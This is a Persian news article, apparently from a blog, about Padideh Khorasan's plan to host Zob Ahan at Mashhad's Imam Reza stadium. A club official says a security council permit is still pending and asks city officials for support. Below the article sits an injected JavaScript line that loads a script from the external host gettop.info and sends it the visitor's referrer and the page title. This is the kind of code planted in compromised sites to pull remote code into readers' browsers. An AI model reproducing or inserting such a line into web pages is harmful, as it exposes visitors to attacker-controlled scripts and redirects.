استفاده از ورزشگاه امام رضا (ع) در گرو مجوز شورای تامین


ورزشگاه امام رضا

در حالی‌که پیش از این گفته می‌‍شد دیدار تیم‌های پدیده و ذوب‌آهن در ورزشگاه امام رضا (ع) برگزار خواهد شد، هنوز مجوز شورای تامین برای برگزاری این دیدار صادر نشده‌ است.

مجتبی سرآسیایی، قائم‌‎مقام باشگاه پدیده خراسان در گفت‌وگو با خبرنگار ورزشی سادس، ضمن تایید این خبر اظهار کرد: جلسه خوبی را روز گذشته با مدیران تربیت‌بدنی آستان قدس و نمایندگان باشگاه سیاه‌جامگان برگزار کردیم و توافق لازم در خصوص استفاده تیم‌های مشهدی از ورزشگاه امام رضا(ع) حاصل شد. فعلا قرار بر این شده که دیدار پدیده و ذوب و همچنین دیدار آتی سیاه‌جامگان در جام حذفی، به شرطی که سیاه‌جامگان در این دیدار میزبان باشد، در این ورزشگاه برگزار شود.

وی افزود: تنها موضوعی که برای برگزاری دیدار پدیده و ذوب‌آهن در ورزشگاه امام رضا(ع) مانده، صدور مجوز توسط شورای تامین است که امیدواریم دوستان در این رابطه به باشگاه پدیده کمک کنند و بتوانیم در این ورزشگاه مدرن، پذیرای ذوب‌آهن باشیم.

قائم‌مقام باشگاه پدیده تاکید کرد: پیمانکار زمین چمن آستان قدس شرط کرده که هر ۱۲ روز یک بار بازی در این ورزشگاه برگزار شود و این موضوع قطعا در ادامه نیز رعایت خواهدشد.

سرآسیایی در خصوص این که گفته می‌شود برگزاری دیدارهای خانگی مشهدی‌ها در ورزشگاه امام رضا (ع) به پس از محرم و صفر موکول شده، تصریح کرد: اصلا در این خصوص صحبتی نداشتیم و برای برگزاری دیدار پدیده و ذوب‌آهن به توافق کامل دست یافتیم.

وی افزود: فوتبال یکی از بهترین ابزارها برای توسعه و ترویج اخلاق در جامعه است. بدون شک می‌توانیم با برگزاری مراسم فرهنگی در این رابطه به بهترین شکل از فوتبال برای ترویج فضیلت‌های اخلاقی در جامعه استفاده کنیم. فوتبال‌دوستان خراسانی نیز ثابت کرده‌اند که همواره در مناسبت‌های مذهبی سنگ تمام گذاشته‌اند و قطعا در محرم و صفر نیز رفتاری از سوی آنان خواهیم دید که در ایران نمونه باشد.

مدیر تیم پدیده خراسان در پایان خاطرنشان کرد: امیدواریم که تمام مسئولان شهر و استان همراهی خوبی با تیم‌های مشهدی داشته‌باشند تا در این راستا بتوانیم از لطف این عزیزان بهره‌مند شویم و مجوزهای لازم برای برگزاری مسابقات صادر شود. بدون شک نتایج فعلی پدیده در تاریخ فوتبال خراسان اگر بی‌نظیر نباشد، کم‌نظیر است اما واقعیت این است که سقف باشگاه خصوصی در فوتبال ایران بالاخره اندازه‌ای دارد. این سقف زمانی بالاتر می‌رود که مدیران شهری و استانی چتر حمایتی خود را روی سر این باشگاه بگیرند.

وی افزود: امیدواریم تمام عزیزان که تلاش‌های‌شان بر کسی پوشیده نیست در همین راستا به باشگاه پدیده کمک کنند تا این نتایج ادامه‌دار باشد و پرچم فوتبال خراسان بعد از سال‌ها به اهتزاز درآید. پدیده هم‌اکنون در جایگاه دوم جدول است و اگر حمایت‌ لازم صورت گیرد و در مسائل این‌چنینی بتوانیم از حضور گسترده هواداران خود بهره‌مند شویم قطعا می‌توانیم این جایگاه خوب را حفظ کنیم.

انتهای پیام

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *